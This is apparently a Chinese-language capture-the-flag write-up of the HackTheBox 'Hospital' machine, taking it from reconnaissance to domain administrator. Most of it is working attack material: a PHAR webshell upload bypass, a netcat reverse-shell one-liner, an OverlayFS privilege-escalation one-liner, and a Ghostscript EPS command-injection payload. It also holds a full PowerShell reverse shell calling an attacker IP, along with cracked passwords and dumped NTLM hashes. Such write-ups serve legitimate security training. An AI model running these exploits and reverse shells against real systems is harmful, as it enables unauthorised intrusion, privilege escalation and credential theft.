知识点:Single-file_PHP_shell,Ubuntu_Local_Privilege_Escalation,Ghostscript-command-injection
Scan
┌──(kali㉿kali)-[~/Desktop/htb/Hospital]└─$ sudo nmap -sC -sV -T4 -Pn 10.10.11.241[sudo] password for kali:Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-22 07:56 ESTNmap scan report for 10.10.11.241Host is up (0.20s latency).Not shown: 980 filtered tcp ports (no-response)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 256 e1:4b:4b:3a:6d:18:66:69:39:f7:aa:74:b3:16:0a:aa (ECDSA)|_ 256 96:c1:dc:d8:97:20:95:e7:01:5f:20:a2:43:61:cb:ca (ED25519)53/tcp open domain Simple DNS Plus88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-11-22 19:56:57Z)135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=DC| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb| Not valid before: 2023-09-06T10:49:03|_Not valid after: 2028-09-06T10:49:03443/tcp open ssl/http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)|_ssl-date: TLS randomness does not represent time| ssl-cert: Subject: commonName=localhost| Not valid before: 2009-11-10T23:48:47|_Not valid after: 2019-11-08T23:48:47|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28| tls-alpn:|_ http/1.1|_http-title: 400 Bad Request445/tcp open microsoft-ds?464/tcp open kpasswd5?593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0636/tcp open ldapssl?| ssl-cert: Subject: commonName=DC| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb| Not valid before: 2023-09-06T10:49:03|_Not valid after: 2028-09-06T10:49:031801/tcp open msmq?2103/tcp open msrpc Microsoft Windows RPC2105/tcp open msrpc Microsoft Windows RPC2107/tcp open msrpc Microsoft Windows RPC2179/tcp open vmrdp?3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=DC| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb| Not valid before: 2023-09-06T10:49:03|_Not valid after: 2028-09-06T10:49:033269/tcp open globalcatLDAPssl?| ssl-cert: Subject: commonName=DC| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb| Not valid before: 2023-09-06T10:49:03|_Not valid after: 2028-09-06T10:49:033389/tcp open ms-wbt-server Microsoft Terminal Services| ssl-cert: Subject: commonName=DC.hospital.htb| Not valid before: 2023-09-05T18:39:34|_Not valid after: 2024-03-06T18:39:34| rdp-ntlm-info:| Target_Name: HOSPITAL| NetBIOS_Domain_Name: HOSPITAL| NetBIOS_Computer_Name: DC| DNS_Domain_Name: hospital.htb| DNS_Computer_Name: DC.hospital.htb| DNS_Tree_Name: hospital.htb| Product_Version: 10.0.17763|_ System_Time: 2023-11-22T19:58:15+00:008080/tcp open http Apache httpd 2.4.55 ((Ubuntu))| http-title: Login|_Requested resource was login.php|_http-open-proxy: Proxy might be redirecting requests| http-cookie-flags:| /:| PHPSESSID:|_ httponly flag not set|_http-server-header: Apache/2.4.55 (Ubuntu)Service Info: Host: DC; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windowsHost script results:| smb2-time:| date: 2023-11-22T19:58:20|_ start_date: N/A| smb2-security-mode:| 3:1:1:|_ Message signing enabled and required|_clock-skew: mean: 6h59m55s, deviation: 0s, median: 6h59m54sService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 146.47 seconds
Enum
看到88,135,139,445基本就是域控了,smb先跑一下看看能不能进共享,无果。把看到的域名hosts一下,看看web渗透有没有机会。
先看443端口,进去只有登录框,没有注册按钮。随便看了下感觉没什么操作空间。
再看8080端口,有个make one可以注册
注册后登录,可以看到有个upload,可以文件上传,但是常规传php文件后缀不行,被ban了
尝试使用phar文件 成功。
Phar的一些利用姿势:https://xz.aliyun.com/t/3692
dirsearch扫目录,发现uploads目录,到这个目录下在输入文件名即可访问木马。
但是这种基础shell system函数不能成功执行,uploads目录还有自动清理功能,过一会文件就被删除了,通过webshell执行命令得到reverse shell,在黑客论坛找到一位大哥的分享:
https://github.com/flozz/p0wny-shell/blob/master/shell.php
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.86 4444 >/tmp/fDocker提权
我们可以拿到shell,发现是在docker内,并且是低权限用户,查看了内核版本,发现和之前的Analytics一样的提权方式
文章链接:https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability#vulnerability-1-cve-2023-2640-ovl_copy_xattr-35
https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("chmod +s /bin/bash")'/bin/bash -p
或者这里直接打CVE-2021-3493提权
https://github.com/briskets/CVE-2021-3493/tree/main
root后查看shadow文件可以发现以下hash,我们直接john爆破,发现可以爆破出drwilliams的密码
root:$y$j9T$s/Aqv48x449udndpLC6eC.$WUkrXgkW46N4xdpnhMoax7US.JgyJSeobZ1dzDs..dD:19612:0:99999:7:::drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:99999:7:::┌──(kali㉿kali)-[~/Desktop/htb/Hospital]└─$ john -w:/usr/share/wordlists/rockyou.txt hashUsing default input encoding: UTF-8Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])Cost 1 (iteration count) is 5000 for all loaded hashesWill run 4 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusqwe123!@# (drwilliams)1g 0:00:01:25 DONE (2023-11-22 09:02) 0.01166g/s 2498p/s 2498c/s 2498C/s raycharles..pucciUse the "--show" option to display all of the cracked passwords reliablySession completed.
webmail
得到的账密可以登录443端口的web界面
进去发现有邮件来往,大概就是说有两个文件, 一个是eps格式,一个是GhostScript可视化,可以通过发送邮件里面加入eps格式的shell,然后他们会执行
GhostScript
搜一波ghostscript相关漏洞
可以发现这个项目:https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection
┌──(kali㉿kali)-[~/Desktop/htb/Hospital/CVE-2023-36664-Ghostscript-command-injection-main]└─$ python3 CVE_2023_36664_exploit.py -g --payload calc --filename geqian --extension eps[+] Generated EPS payload file: geqian.eps┌──(kali㉿kali)-[~/Desktop/htb/Hospital/CVE-2023-36664-Ghostscript-command-injection-main]└─$ cat geqian.eps%!PS-Adobe-3.0 EPSF-3.0%%BoundingBox: 0 0 300 300%%Title: Welcome EPS/Times-Roman findfont24 scalefontsetfontnewpath50 200 moveto(Welcome at vsociety!) shownewpath30 100 moveto60 230 lineto90 100 linetostroke(%pipe%calc) (w) file /DCTDecode filtershowpage
上面跟着github随便生成一个测试的,然后直接修改其中calc为reverse powershell即可
在线生成rev网站:https://www.revshells.com/
然后发送邮件,即可getshell
User-flag
进去后得到一组账号,并且发现可以rdp
drbrown:chr!$br0wn
rdp进去看看,password输入框的password属性改text即可看到密码
xfreerdp /v:hospital.htb /u:'drbrown' /p:'chr!$br0wn' /d:"dc.hospital.htb"
这里用rdesktop或者remmina可能登录不了,不知道为啥(估计是协议问题???
rdesktop -u drbrown -p 'chr!$br0wn' -d dc.hospital.htb hospital.htb
ROOT
得到密码直接winrm即可,弹shell到msf把hashdump了
Administrator:Th3B3stH0sp1t4l9786!evil-winrm -i 10.10.11.241 -u Administrator -p 'Th3B3stH0sp1t4l9786!'
meterpreter > getuidServer username: HOSPITALAdministratormeterpreter > hashdump[*] Meterpreter session 3 opened (10.10.14.119:6666 -> 10.10.11.241:21083) at 2023-11-22 10:42:05 -0500Administrator:500:aad3b435b51404eeaad3b435b51404ee:a1a0158142556cfc5aa9fdb974e0352f:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:26fb7ca2f4a67b2d8d81ffcfeeeffd13:::$431000-R1KSAI1DGHMH:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::SM_0559ce7ac4be4fc6a:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::SM_bb030ff39b6c4a2db:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::SM_9326b57ae8ea44309:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::SM_b1b9e7f83082488ea:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::SM_e5b6f3aed4da4ac98:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::SM_75554ef7137f41d68:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::SM_6e9de17029164abdb:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::SM_5faa2be1160c4ead8:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::SM_2fe3f3cbbafa4566a:1133:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::drbrown:1601:aad3b435b51404eeaad3b435b51404ee:33a3edc8fc4cf06cb3b836c541a7b997:::drwilliams:1602:aad3b435b51404eeaad3b435b51404ee:c377ba8a4dd52401bc404dbe49771bbc:::DC$:1000:aad3b435b51404eeaad3b435b51404ee:e5ab307522689fdeb58c50aec017c1a4:::
非预期
通过枚举是可以发现在xampp目录下的htdocs是有system权限的(用icacls看
那么意味着,医院内部网站getshell了,就直接拿到了NT AUTHORITYSYSTEM权限,那么在该文件夹加入shell,然后反弹
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.10.14.119', 8888);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"
原文始发于微信公众号(搁浅安全):HTB-Hospital(Medium)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论